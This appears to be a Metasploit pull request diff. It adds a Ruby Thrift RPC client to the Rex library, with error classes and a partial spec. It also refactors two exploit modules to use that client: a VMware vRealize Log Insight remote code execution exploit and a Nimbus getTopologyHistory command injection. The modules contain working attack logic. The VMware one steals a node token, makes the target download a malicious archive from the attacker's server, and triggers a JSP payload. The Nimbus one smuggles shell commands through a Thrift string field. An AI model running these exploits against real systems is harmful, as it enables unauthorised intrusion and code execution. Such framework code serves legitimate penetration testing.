### PR TITLE
Add a Thrift RPC client

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_vrli_rce.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrli_rce.md
@@ -42,11 +42,8 @@ After these steps, the web portal (port 80/443) and Apache thrift service (port 
 ### THRIFT_PORT
 This is the Thrift service port for VMware xRealize Log Insight.
 
-### THRIFT_TIMEOUT
-This value represents the timeout duration for thrift service responses.
-
-## WaitForResponseTimeout
-This value represents timeout duration in seconds for RemotePakDownload command response.
+### ThriftTimeout
+Thrift response and connection timeout duration.
 
 ## WaitForUpgradeDuration
 This value represents the duration of wait after issuing a PakUpgrade command.

--- a/lib/rex/proto/thrift.rb
+++ b/lib/rex/proto/thrift.rb
@@ -88,7 +88,7 @@ module Rex::Proto::Thrift
     endian :big
 
     thrift_data_type :data_type
-    int32            :members_size
+    int32            :members_size, initial_value: -> { members.num_bytes }
     choice           :members, onlyif: -> { members_size > 0 }, selection: :data_type do
       array ThriftDataType::T_BOOLEAN, type: :thrift_boolean, read_until: -> { members.num_bytes == members_size }
       array ThriftDataType::T_I16, type: :int16, read_until: -> { members.num_bytes == members_size }

--- a/lib/rex/proto/thrift.rb
+++ b/lib/rex/proto/thrift.rb
@@ -2,6 +2,7 @@
 
 require 'bindata'
 
+# @see: https://diwakergupta.github.io/thrift-missing-guide/
 module Rex::Proto::Thrift
   class ThriftData < BinData::Record  # forward definition
     endian :big
@@ -141,6 +142,7 @@ module Rex::Proto::Thrift
       thrift_array    ThriftDataType::T_LIST
     end
 
+    # Short hand method for defining a boolean field
     def self.boolean(field_id, value)
       { data_type: ThriftDataType::T_BOOLEAN, field_id: field_id, data_value: value }
     end

--- a/lib/rex/proto/thrift.rb
+++ b/lib/rex/proto/thrift.rb
@@ -53,4 +53,7 @@ module Rex::Proto::Thrift
       string ThriftDataType::T_UTF7
     end
   end
+
+  require 'rex/proto/thrift/client'
+  require 'rex/proto/thrift/error'
 end

--- a/lib/rex/proto/thrift.rb
+++ b/lib/rex/proto/thrift.rb
@@ -1,9 +1,22 @@
 # -*- coding: binary -*-
 
+require 'bindata'
+
 module Rex::Proto::Thrift
+  class ThriftData < BinData::Record  # forward definition
+    endian :big
+  end
+
   class ThriftDataType < BinData::Uint8
     T_STOP = 0
+    T_BOOLEAN = 2
+    T_I16 = 6
+    T_I32 = 8
+    T_I64 = 10
     T_UTF7 = 11
+    T_STRUCT = 12
+    T_SET = 14
+    T_LIST = 15
 
     default_parameter assert: -> { !ThriftDataType.name(value).nil? }
 
@@ -16,9 +29,81 @@ module Rex::Proto::Thrift
     end
   end
 
+  class ThriftBoolean < BinData::Primitive
+    int8 :val
+
+    def get
+      self.val != 0
+    end
+
+    def set(v)
+      self.val = v ? 1 : 0
+    end
+  end
+
+  class ThriftString < BinData::Primitive
+    endian :big
+
+    int32  :len,  value: -> { data.length }
+    string :data, read_length: :len
+
+    def get
+      self.data.to_s
+    end
+
+    def set(v)
+      self.data = v
+    end
+  end
+
+  class ThriftStruct < BinData::Array
+    # this is effectively an array terminated by a T_STOP entry
+    default_parameter type: :thrift_data
+    default_parameter read_until: -> { element.data_type == ThriftDataType::T_STOP }
+
+    # Recursively flatten struct's members into to a hash, keyed by field ID. This is a one way operation because the
+    # width of numbers is lost.
+    def self.flatten(struct)
+      struct = struct.snapshot if struct.is_a?(ThriftStruct)
+      flattened = {}
+      struct.each do |member|
+        case member[:data_type]
+        when ThriftDataType::T_STOP
+          break
+        when ThriftDataType::T_STRUCT
+          field_value = flatten(member[:data_value])
+        else
+          field_value = member[:data_value]
+        end
+
+        flattened[member[:field_id]] = field_value
+      end
+
+      flattened
+    end
+  end
+
+  class ThriftArray < BinData::Record
+    endian :big
+
+    thrift_data_type :data_type
+    int32            :members_size
+    choice           :members, onlyif: -> { members_size > 0 }, selection: :data_type do
+      array ThriftDataType::T_BOOLEAN, type: :thrift_boolean, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_I16, type: :int16, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_I32, type: :int32, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_I64, type: :int64, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_UTF7, type: :thrift_string, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_STRUCT, type: :thrift_struct, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_SET, type: :thrift_array, read_until: -> { members.num_bytes == members_size }
+      array ThriftDataType::T_LIST, type: :thrift_array, read_until: -> { members.num_bytes == members_size }
+    end
+  end
+
   class ThriftMessageType < BinData::Uint16be
     CALL = 1
     REPLY = 2
+    EXCEPTION = 3
 
     default_parameter assert: -> { !ThriftMessageType.name(value).nil? }
 
@@ -33,24 +118,63 @@ module Rex::Proto::Thrift
 
   class ThriftHeader < BinData::Record
     endian :big
-    search_prefix :thrift
 
-    uint16       :version, initial_value: 0x8001
-    message_type :message_type
-    uint32       :method_name_length, value: -> { method_name.length }
-    string       :method_name, read_length: :method_name_length
-    uint32       :sequence_id
+    uint16              :version, initial_value: 0x8001
+    thrift_message_type :message_type
+    thrift_string       :method_name, read_length: :method_name_length
+    uint32              :sequence_id
   end
 
   class ThriftData < BinData::Record
     endian :big
-    search_prefix :thrift
 
-    data_type :data_type, initial_value: ThriftDataType::T_STOP
-    uint16    :field_id, onlyif: -> { data_type != ThriftDataType::T_STOP }
-    uint32    :data_length, onlyif: -> { data_type != ThriftDataType::T_STOP }, value: -> { data_value.length }
-    choice    :data_value, onlyif: -> { data_type != ThriftDataType::T_STOP }, selection: :data_type do
-      string ThriftDataType::T_UTF7
+    thrift_data_type :data_type, initial_value: ThriftDataType::T_STOP
+    uint16           :field_id, onlyif: -> { data_type != ThriftDataType::T_STOP }
+    choice           :data_value, onlyif: -> { data_type != ThriftDataType::T_STOP }, selection: :data_type do
+      thrift_boolean  ThriftDataType::T_BOOLEAN
+      int16           ThriftDataType::T_I16
+      int32           ThriftDataType::T_I32
+      int64           ThriftDataType::T_I64
+      thrift_string   ThriftDataType::T_UTF7
+      thrift_struct   ThriftDataType::T_STRUCT
+      thrift_array    ThriftDataType::T_SET
+      thrift_array    ThriftDataType::T_LIST
+    end
+
+    def self.boolean(field_id, value)
+      { data_type: ThriftDataType::T_BOOLEAN, field_id: field_id, data_value: value }
+    end
+
+    def self.i16(field_id, value)
+      { data_type: ThriftDataType::T_I16, field_id: field_id, data_value: value }
+    end
+
+    def self.i32(field_id, value)
+      { data_type: ThriftDataType::T_I32, field_id: field_id, data_value: value }
+    end
+
+    def self.i64(field_id, value)
+      { data_type: ThriftDataType::T_I64, field_id: field_id, data_value: value }
+    end
+
+    def self.list(field_id, data_type, value)
+      { data_type: ThriftDataType::T_LIST, field_id: field_id, data_value: { data_type: data_type, members: value } }
+    end
+
+    def self.set(field_id, data_type, value)
+      { data_type: ThriftDataType::T_SET, field_id: field_id, data_value: { data_type: data_type, members: value } }
+    end
+
+    def self.stop
+      { data_type: ThriftDataType::T_STOP }
+    end
+
+    def self.struct(field_id, value)
+      { data_type: ThriftDataType::T_STRUCT, field_id: field_id, data_value: value }
+    end
+
+    def self.utf7(field_id, value)
+      { data_type: ThriftDataType::T_UTF7, field_id: field_id, data_value: value }
     end
   end
 

--- a/lib/rex/proto/thrift/client.rb
+++ b/lib/rex/proto/thrift/client.rb
@@ -1,3 +1,5 @@
+require 'rex/stopwatch'
+
 class Rex::Proto::Thrift::Client
   include Rex::Proto::Thrift
 
@@ -18,10 +20,6 @@ class Rex::Proto::Thrift::Client
   attr_accessor :timeout
 
   def initialize(host, port, context: {}, ssl: false, ssl_version: nil, comm: nil, timeout: 10)
-    if port.nil?
-      port = ssl ? 5671 : 5672
-    end
-
     @host = host
     @port = port
     @context = context

--- a/lib/rex/proto/thrift/client.rb
+++ b/lib/rex/proto/thrift/client.rb
@@ -1,0 +1,120 @@
+class Rex::Proto::Thrift::Client
+  include Rex::Proto::Thrift
+
+  # @return [String] The Thrift server host.
+  attr_reader :host
+
+  # @return [Integer] The Thrift server port.
+  attr_reader :port
+
+  # @return [Boolean] Whether or not SSL is used for the connection.
+  attr_reader :ssl
+
+  # @return [Rex::Socket::Comm] An optional, explicit object to use for creating the connection.
+  attr_reader :comm
+
+  # @!attribute timeout
+  #   @return [Integer] The communication timeout in seconds.
+  attr_accessor :timeout
+
+  def initialize(host, port, context: {}, ssl: false, ssl_version: nil, comm: nil, timeout: 10)
+    if port.nil?
+      port = ssl ? 5671 : 5672
+    end
+
+    @host = host
+    @port = port
+    @context = context
+    @ssl = ssl
+    @ssl_version = ssl_version
+    @comm = comm
+    @timeout = timeout
+  end
+
+  # Establish the connection to the remote server.
+  #
+  # @param [Integer] t An explicit timeout to use for the connection otherwise the default will be used.
+  # @return [NilClass]
+  def connect(t = -1)
+    timeout = (t.nil? or t == -1) ? @timeout : t
+
+    @conn = Rex::Socket::Tcp.create(
+      'PeerHost'   => @host,
+      'PeerPort'   => @port.to_i,
+      'Context'    => @context,
+      'SSL'        => @ssl,
+      'SSLVersion' => @ssl_version,
+      'Timeout'    => timeout,
+      'Comm'       => @comm
+    )
+
+    nil
+  end
+
+  # Close the connection to the remote server.
+  #
+  # @return [NilClass]
+  def close
+    if @conn && !@conn.closed?
+      @conn.shutdown
+      @conn.close
+    end
+
+    @conn = nil
+  end
+
+  def send_raw(data)
+    @conn.put([data.length].pack('N') + data)
+  end
+
+  def recv_raw(timeout: @timeout)
+    remaining = timeout
+    frame_size, elapsed_time = Rex::Stopwatch.elapsed_time do
+      @conn.get_once(4, remaining)
+    end
+    remaining -= elapsed_time
+    if frame_size.nil? || frame_size.length < 4
+      raise Rex::TimeoutError, 'Failed to read the response data length due to timeout.'
+    end
+
+    frame_size = frame_size.unpack1('N')
+    body = ''
+    while (body.size < frame_size) && remaining > 0
+      chunk, elapsed_time = Rex::Stopwatch.elapsed_time do
+        @conn.read(frame_size - body.size, remaining)
+      end
+      remaining -= elapsed_time
+      body << chunk
+    end
+
+    unless body.size == (frame_size)
+      if remaining <= 0
+        raise Rex::TimeoutError, 'Failed to read the response data due to timeout.'
+      end
+
+      raise Error::InvalidFrameError.new
+    end
+
+    body
+  end
+
+  def call_raw(method_name, *data, timeout: @timeout)
+    tx_header = ThriftHeader.new(method_name: method_name, message_type: ThriftMessageType::CALL)
+    tx_data = data.map do |part|
+      part.is_a?(BinData::Struct) ? part.to_binary_s : part
+    end
+
+    send_raw(tx_header.to_binary_s + tx_data.join)
+    rx_data = recv_raw(timeout: timeout)
+    rx_header = ThriftHeader.read(rx_data)
+    unless rx_header.message_type == ThriftMessageType::REPLY
+      raise Error::UnexpectedReplyError.new(rx_header, 'The received header was not a REPLY message.')
+    end
+
+    unless rx_header.method_name == method_name
+      raise Error::UnexpectedReplyError.new(rx_header, 'The received header was not to the expected method.')
+    end
+
+    rx_data[rx_header.num_bytes..]
+  end
+end

--- a/lib/rex/proto/thrift/client.rb
+++ b/lib/rex/proto/thrift/client.rb
@@ -63,10 +63,18 @@ class Rex::Proto::Thrift::Client
     @conn = nil
   end
 
+  # Send raw data to the remote peer.
+  #
+  # @param [String] data The data to send.
   def send_raw(data)
     @conn.put([data.length].pack('N') + data)
   end
 
+  # Receive raw data from the remote peer.
+  #
+  # @param [Float] timeout The timeout to use for this receive operation. Defaults to the instance timeout.
+  # @raise [Rex::TimeoutError] Raised when all of the data was not received within the timeout.
+  # @return [String] The received data.
   def recv_raw(timeout: @timeout)
     remaining = timeout
     frame_size, elapsed_time = Rex::Stopwatch.elapsed_time do
@@ -98,6 +106,14 @@ class Rex::Proto::Thrift::Client
     body
   end
 
+  # Call the specific method on the remote peer.
+  #
+  # @param [String] method_name The method name to call.
+  # @param [BinData::Struct, Hash, String] *data The data to send in the method call.
+  # @param [Float] timeout The timeout to use for this call operation. Defaults to the instance timeout.
+  # @raise [Error::UnexpectedReplyError] Raised if the reply was not to the method call.
+  # @raise [Rex::TimeoutError] Raised when all of the data was not received within the timeout.
+  # @return [Array<Hash>] The results of the method call.
   def call(method_name, *data, timeout: @timeout)
     tx_header = ThriftHeader.new(method_name: method_name, message_type: ThriftMessageType::CALL)
     tx_data = data.map do |part|

--- a/lib/rex/proto/thrift/error.rb
+++ b/lib/rex/proto/thrift/error.rb
@@ -1,0 +1,21 @@
+module Rex::Proto::Thrift::Error
+  # Base class of Thrift-specific errors.
+  class ThriftError < Rex::RuntimeError
+  end
+
+  # Raised when trying to parse a frame that is invalid.
+  class InvalidFrameError < ThriftError
+    def initialize(msg='Invalid Thrift frame data was received and could not be parsed.')
+      super(msg)
+    end
+  end
+
+  # Raised when an unexpected reply is received.
+  class UnexpectedReplyError < ThriftError
+    attr_reader :reply
+    def initialize(reply, msg='An unexpected Thrift reply was received.')
+      @reply = reply
+      super(msg)
+    end
+  end
+end

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -16,8 +16,6 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::FileDropper # includes register_files_for_cleanup
   prepend Msf::Exploit::Remote::AutoCheck
 
-  Thrift = Rex::Proto::Thrift
-
   def initialize(info = {})
     super(
       update_info(
@@ -87,14 +85,13 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         Opt::RPORT(443),
         OptPort.new('THRIFT_PORT', [true, 'Thrift service port', 16520]),
-        OptInt.new('THRIFT_TIMEOUT', [true, 'Timeout duration for thrift service', 10]),
         OptString.new('TARGETURI', [true, 'The URI of the VRLI web service', '/'])
       ]
     )
 
     register_advanced_options(
       [
-        OptInt.new('WaitForResponseTimeout', [ true, 'The timeout in seconds for RemotePakDownload response', 10 ]),
+        OptInt.new('ThriftTimeout', [ true, 'Thrift response and connection timeout duration', 10 ]),
         OptInt.new('WaitForUpgradeDuration', [ true, 'The sleep duration in seconds for PakUpgrade process', 2 ])
       ]
     )
@@ -251,7 +248,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    # This is important check...
+    # This is an important check...
     fail_with(Failure::BadConfig, 'SRVHOST can\'t be localhost') if datastore['SRVHOST'] =~ /(127|0)\.0\.0\.(0|1)|localhost/
 
     # Step 1 generate malicious TAR archive
@@ -263,33 +260,28 @@ class MetasploitModule < Msf::Exploit::Remote
     start_service('Path' => "/#{file_name}.tar")
 
     # Connect to the Apache Thrift service
-    @tsock = Rex::Socket.create_tcp('PeerHost' => datastore['RHOST'], 'PeerPort' => datastore['THRIFT_PORT'])
-    fail_with(Failure::Unreachable, "#{peer}:#{datastore['THRIFT_PORT']} - Could not connect to the thrift service") if @tsock.nil?
+    thrift_client = Rex::Proto::Thrift::Client.new(
+      target_host,
+      datastore['THRIFT_PORT'],
+      context: { 'Msf' => framework, 'MsfExploit' => self },
+      timeout: datastore['ThriftTimeout']
+    )
+    thrift_client.connect
 
     # Step 2 obtain node token
     print_status 'Fetching thrift config...'
-    send_request([
-      Thrift::ThriftHeader.new(method_name: 'getConfig', message_type: Thrift::ThriftMessageType::CALL)
-    ].map(&:to_binary_s).join + "\x0c\x00\x01\x00\x00")
-
-    config = recv_response(datastore['THRIFT_TIMEOUT'])
-    fail_with(Failure::UnexpectedReply, 'getConfig thrift call failed') if config.nil?
+    config = thrift_client.call_raw('getConfig', "\x0c\x00\x01\x00\x00".b)
     token = config.match(/[0-9a-z]{8}-([0-9a-z]{4}-){3}[0-9a-z]{12}/).to_s
     fail_with(Failure::UnexpectedReply, 'Could not obtain node token') if token.nil? || token.empty?
     print_good "Obtained node token: #{token}"
 
     print_status 'Sending getNodeType...'
-    send_request([
-      Thrift::ThriftHeader.new(method_name: 'getNodeType', message_type: Thrift::ThriftMessageType::CALL)
-    ].map(&:to_binary_s).join + "\x00")
+    thrift_client.call_raw('getNodeType', "\x00".b)
 
     # Step 3 download the malicious pak
     serve_address = "http://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{file_name}.tar"
     print_status 'Sending RemotePakDownloadCommand...'
-    download_pak_req = "\x80\x01\x00\x01"
-    download_pak_req += "\x00\x00\x00\x0a\x72\x75\x6e\x43"
-    download_pak_req += "\x6f\x6d\x6d\x61\x6e\x64\x00\x00"
-    download_pak_req += "\x00\x00\x0c\x00\x01\x0c\x00\x01"
+    download_pak_req = "\x0c\x00\x01\x0c\x00\x01"
     download_pak_req += "\x08\x00\x01\x00\x00\x00\x09\x0c"
     download_pak_req += "\x00\x0a\x0b\x00\x01"
     download_pak_req += [token.length].pack('N') + token + "\x0b\x00\x02"
@@ -297,19 +289,14 @@ class MetasploitModule < Msf::Exploit::Remote
     download_pak_req += "\x0b\x00\x03" + [file_name.length].pack('N') + file_name
     download_pak_req += "\x00\x00\x0a\x00\x02\x00\x00"
     download_pak_req += "\x00\x00\x00\x00\x07\xd0\x00\x00"
-    send_request(download_pak_req)
-    download_resp = recv_response(datastore['THRIFT_TIMEOUT'])
-    fail_with(Failure::UnexpectedReply, 'RemotePakDownloadCommand thrift call failed') if download_resp.nil?
+    thrift_client.call_raw('runCommand', download_pak_req)
     retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do
       @got_request
     end
 
     # Step 4 trigger pak upgrade
     print_status 'Sending PakUpgradeCommand...'
-    pak_upgrade_req = "\x80\x01\x00\x01"
-    pak_upgrade_req += "\x00\x00\x00\x0a\x72\x75\x6e\x43"
-    pak_upgrade_req += "\x6f\x6d\x6d\x61\x6e\x64\x00\x00"
-    pak_upgrade_req += "\x00\x00\x0c\x00\x01\x0c\x00\x01"
+    pak_upgrade_req = "\x0c\x00\x01\x0c\x00\x01"
     pak_upgrade_req += "\x08\x00\x01\x00\x00\x00\x08\x0c"
     pak_upgrade_req += "\x00\x09\x0b\x00\x01" + [pak_name.length].pack('N')
     pak_upgrade_req += pak_name + "\x02\x00\x02\x00"
@@ -319,8 +306,7 @@ class MetasploitModule < Msf::Exploit::Remote
     pak_upgrade_req += "\x6e\x67\x02\x00\x06\x00\x00\x00"
     pak_upgrade_req += "\x0a\x00\x02\x00\x00\x00\x00\x00"
     pak_upgrade_req += "\x00\x07\xd0\x00\x00"
-    send_request(pak_upgrade_req)
-    upgrade_resp = recv_response(datastore['THRIFT_TIMEOUT'])
+    upgrade_resp = thrift_client.call_raw('runCommand', pak_upgrade_req)
     fail_with(Failure::UnexpectedReply, 'PakUpgradeCommand thrift call failed') if upgrade_resp.nil? || !upgrade_resp.to_s =~ 'The PAK file is corrupted'
     print_good 'PakUpgrade request is successful'
     print_status "Waiting #{datastore['WaitForUpgradeDuration']} second for PakUpgrade..."
@@ -328,7 +314,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Step 5 trigger the JSP payload.
     print_status "#{peer} - Triggering JSP payload..."
-    disconnect
+    thrift_client.close
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'rest-api', 'v5'),
@@ -336,27 +322,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
     fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service") if res.nil?
     fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected response (response code: #{res.code})") unless res.code == 200
-  end
-
-  def send_request(request)
-    @tsock.put([request.length].pack('N') + request)
-  end
-
-  def recv_response(timeout)
-    remaining = timeout
-    res_size, elapsed = Rex::Stopwatch.elapsed_time do
-      @tsock.timed_read(4, remaining)
-    end
-
-    remaining -= elapsed
-    return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
-
-    res = @tsock.timed_read(res_size.unpack1('N'), remaining)
-
-    return nil if res.nil? || res.length != res_size.unpack1('N')
-
-    return res_size + res
-  rescue Timeout::Error
-    return nil
+  rescue Rex::Proto::Thrift::Error::InvalidFrameError, Rex::Proto::Thrift::Error::UnexpectedReplyError => e
+    fail_with(Failure::UnexpectedReply, "#{peer} - #{e}")
   end
 end

--- a/modules/exploits/linux/http/vmware_vrli_rce.rb
+++ b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -254,7 +254,6 @@ class MetasploitModule < Msf::Exploit::Remote
     # Step 1 generate malicious TAR archive
     file_name = Rex::Text.rand_text_alpha(7)
     pak_name = "#{file_name}.pak"
-    output_file = '/dev/null'
     register_files_for_cleanup("/tmp/#{pak_name}")
     print_status('Starting Payload Server')
     start_service('Path' => "/#{file_name}.tar")
@@ -270,44 +269,69 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Step 2 obtain node token
     print_status 'Fetching thrift config...'
-    config = thrift_client.call_raw('getConfig', "\x0c\x00\x01\x00\x00".b)
-    token = config.match(/[0-9a-z]{8}-([0-9a-z]{4}-){3}[0-9a-z]{12}/).to_s
+    config = thrift_client.call(
+      'getConfig',
+      Rex::Proto::Thrift::ThriftData.struct(1, [ Rex::Proto::Thrift::ThriftData.stop ]),
+      Rex::Proto::Thrift::ThriftData.stop
+    )
+    config_xml = Rex::Proto::Thrift::ThriftStruct.flatten(config).dig(0, 3)
+    fail_with(Failure::UnexpectedReply, 'Could not obtain configuration XML') if config_xml.nil?
+
+    token = Nokogiri::XML(config_xml).xpath('/config/distributed/daemon')&.attr('token').to_s
     fail_with(Failure::UnexpectedReply, 'Could not obtain node token') if token.nil? || token.empty?
     print_good "Obtained node token: #{token}"
 
     print_status 'Sending getNodeType...'
-    thrift_client.call_raw('getNodeType', "\x00".b)
+    thrift_client.call('getNodeType', Rex::Proto::Thrift::ThriftData.stop)
 
     # Step 3 download the malicious pak
-    serve_address = "http://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{file_name}.tar"
+    server_url = "http://#{Rex::Socket.to_authority(datastore['SRVHOST'], datastore['SRVPORT'])}/#{file_name}.tar"
     print_status 'Sending RemotePakDownloadCommand...'
-    download_pak_req = "\x0c\x00\x01\x0c\x00\x01"
-    download_pak_req += "\x08\x00\x01\x00\x00\x00\x09\x0c"
-    download_pak_req += "\x00\x0a\x0b\x00\x01"
-    download_pak_req += [token.length].pack('N') + token + "\x0b\x00\x02"
-    download_pak_req += [serve_address.length].pack('N') + serve_address # "\x00\x00\x00\x24" + serve_address
-    download_pak_req += "\x0b\x00\x03" + [file_name.length].pack('N') + file_name
-    download_pak_req += "\x00\x00\x0a\x00\x02\x00\x00"
-    download_pak_req += "\x00\x00\x00\x00\x07\xd0\x00\x00"
-    thrift_client.call_raw('runCommand', download_pak_req)
+    thrift_client.call(
+      'runCommand',
+      Rex::Proto::Thrift::ThriftData.struct(1, [
+        Rex::Proto::Thrift::ThriftData.struct(1, [
+          Rex::Proto::Thrift::ThriftData.i32(1, 9),
+          Rex::Proto::Thrift::ThriftData.struct(10, [
+            Rex::Proto::Thrift::ThriftData.utf7(1, token),
+            Rex::Proto::Thrift::ThriftData.utf7(2, server_url),
+            Rex::Proto::Thrift::ThriftData.utf7(3, file_name),
+            Rex::Proto::Thrift::ThriftData.stop
+          ]),
+          Rex::Proto::Thrift::ThriftData.stop
+        ]),
+        Rex::Proto::Thrift::ThriftData.i64(2, 2000),
+        Rex::Proto::Thrift::ThriftData.stop
+      ]),
+      Rex::Proto::Thrift::ThriftData.stop
+    )
     retry_until_truthy(timeout: datastore['ReconnectTimeout'].to_i) do
       @got_request
     end
 
     # Step 4 trigger pak upgrade
     print_status 'Sending PakUpgradeCommand...'
-    pak_upgrade_req = "\x0c\x00\x01\x0c\x00\x01"
-    pak_upgrade_req += "\x08\x00\x01\x00\x00\x00\x08\x0c"
-    pak_upgrade_req += "\x00\x09\x0b\x00\x01" + [pak_name.length].pack('N')
-    pak_upgrade_req += pak_name + "\x02\x00\x02\x00"
-    pak_upgrade_req += "\x0b\x00\x03" + [output_file.length].pack('N') + + output_file
-    pak_upgrade_req += "\x02\x00\x04\x00"
-    pak_upgrade_req += "\x0b\x00\x05\x00\x00\x00\x03\x65"
-    pak_upgrade_req += "\x6e\x67\x02\x00\x06\x00\x00\x00"
-    pak_upgrade_req += "\x0a\x00\x02\x00\x00\x00\x00\x00"
-    pak_upgrade_req += "\x00\x07\xd0\x00\x00"
-    upgrade_resp = thrift_client.call_raw('runCommand', pak_upgrade_req)
-    fail_with(Failure::UnexpectedReply, 'PakUpgradeCommand thrift call failed') if upgrade_resp.nil? || !upgrade_resp.to_s =~ 'The PAK file is corrupted'
+    thrift_client.call(
+      'runCommand',
+      Rex::Proto::Thrift::ThriftData.struct(1, [
+        Rex::Proto::Thrift::ThriftData.struct(1, [
+          Rex::Proto::Thrift::ThriftData.i32(1, 8),
+          Rex::Proto::Thrift::ThriftData.struct(9, [
+            Rex::Proto::Thrift::ThriftData.utf7(1, pak_name),
+            Rex::Proto::Thrift::ThriftData.boolean(2, false),
+            Rex::Proto::Thrift::ThriftData.utf7(3, '/dev/null'),
+            Rex::Proto::Thrift::ThriftData.boolean(4, false),
+            Rex::Proto::Thrift::ThriftData.utf7(5, 'eng'),
+            Rex::Proto::Thrift::ThriftData.boolean(6, false),
+            Rex::Proto::Thrift::ThriftData.stop
+          ]),
+          Rex::Proto::Thrift::ThriftData.stop
+        ]),
+        Rex::Proto::Thrift::ThriftData.i64(2, 2000),
+        Rex::Proto::Thrift::ThriftData.stop
+      ]),
+      Rex::Proto::Thrift::ThriftData.stop
+    )
     print_good 'PakUpgrade request is successful'
     print_status "Waiting #{datastore['WaitForUpgradeDuration']} second for PakUpgrade..."
     sleep(datastore['WaitForUpgradeDuration'])

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -118,10 +118,10 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"
     vprint_status("Executing command: #{cmd}")
 
-    @thrift_client.call_raw(
+    @thrift_client.call(
       'getTopologyHistory',
-      Thrift::ThriftData.new(data_type: Thrift::ThriftDataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
-      Thrift::ThriftData.new,
+      Thrift::ThriftData.utf7(1, ";#{cmd}"),
+      Thrift::ThriftData.stop,
       timeout: opts.fetch(:timeout, datastore['ThriftTimeout'])
     )
   rescue Rex::TimeoutError

--- a/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
+++ b/modules/exploits/linux/misc/nimbus_gettopologyhistory_cmd_exec.rb
@@ -73,6 +73,12 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+
+    register_advanced_options(
+      [
+        OptInt.new('ThriftTimeout', [ true, 'Thrift response and connection timeout duration', 10 ])
+      ]
+    )
   end
 
   def check
@@ -84,13 +90,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     sleep_time = rand(5..10)
     response, elapsed_time = Rex::Stopwatch.elapsed_time do
-      execute_command("sleep #{sleep_time}", { disconnect: false })
-      recv_response(sleep_time + 5)
+      execute_command("sleep #{sleep_time}", timeout: sleep_time + 3)
     end
-    disconnect
 
     vprint_status("Elapsed time: #{elapsed_time} seconds")
-
     unless response && elapsed_time > sleep_time
       return CheckCode::Safe('Failed to test command injection.')
     end
@@ -99,6 +102,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    connect
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
 
     case target['Type']
@@ -110,38 +114,34 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, opts = {})
-    # comment out the rest of the command to ensure it's only executed once and prefix a random tag to avoid caching
+    # comment out the rest of the command to ensure it's only executed once and append a random tag to avoid caching
     cmd = "#{cmd} ##{Rex::Text.rand_text_alphanumeric(4..8)}"
     vprint_status("Executing command: #{cmd}")
 
-    send_request([
-      Thrift::ThriftHeader.new(message_type: Thrift::ThriftMessageType::CALL, method_name: 'getTopologyHistory'),
+    @thrift_client.call_raw(
+      'getTopologyHistory',
       Thrift::ThriftData.new(data_type: Thrift::ThriftDataType::T_UTF7, field_id: 1, data_value: ";#{cmd}"),
-      Thrift::ThriftData.new
-    ].map(&:to_binary_s).join)
-    disconnect if opts.fetch(:disconnect, true)
+      Thrift::ThriftData.new,
+      timeout: opts.fetch(:timeout, datastore['ThriftTimeout'])
+    )
+  rescue Rex::TimeoutError
+    nil
   end
 
-  def send_request(request)
-    connect if sock.nil?
-    sock.put([ request.length ].pack('N') + request)
+  def connect
+    @thrift_client = Rex::Proto::Thrift::Client.new(
+      target_host,
+      datastore['RPORT'],
+      context: { 'Msf' => framework, 'MsfExploit' => self },
+      timeout: datastore['ThriftTimeout']
+    )
+    @thrift_client.connect
   end
 
-  def recv_response(timeout)
-    remaining = timeout
-    res_size, elapsed = Rex::Stopwatch.elapsed_time do
-      sock.timed_read(4, remaining)
-    end
+  def cleanup
+    return unless @thrift_client
 
-    remaining -= elapsed
-    return nil if res_size.nil? || res_size.length != 4 || remaining <= 0
-
-    res = sock.timed_read(res_size.unpack1('N'), remaining)
-
-    return nil if res.nil? || res.length != res_size.unpack1('N')
-
-    return res_size + res
-  rescue Timeout::Error
-    return nil
+    @thrift_client.close
+    @thrift_client = nil
   end
 end

--- a/spec/lib/rex/proto/thrift/client_spec.rb
+++ b/spec/lib/rex/proto/thrift/client_spec.rb
@@ -1,0 +1,55 @@
+# -*- coding: binary -*-
+require 'spec_helper'
+require 'rex/text'
+
+RSpec.describe Rex::Proto::Thrift::Client do
+  let(:target_host) { '127.0.0.1' }
+  let(:target_port) { 1234 }
+  subject(:instance) { described_class.new(target_host, target_port) }
+
+  it { should respond_to :host }
+  it { should respond_to :port }
+  it { should respond_to :ssl }
+  it { should respond_to :timeout }
+
+  it 'should default SSL to false' do
+    expect(instance.ssl).to eq false
+  end
+
+  describe '#call' do
+    let(:method_name) { Rex::Text.rand_text_alphanumeric(10) }
+
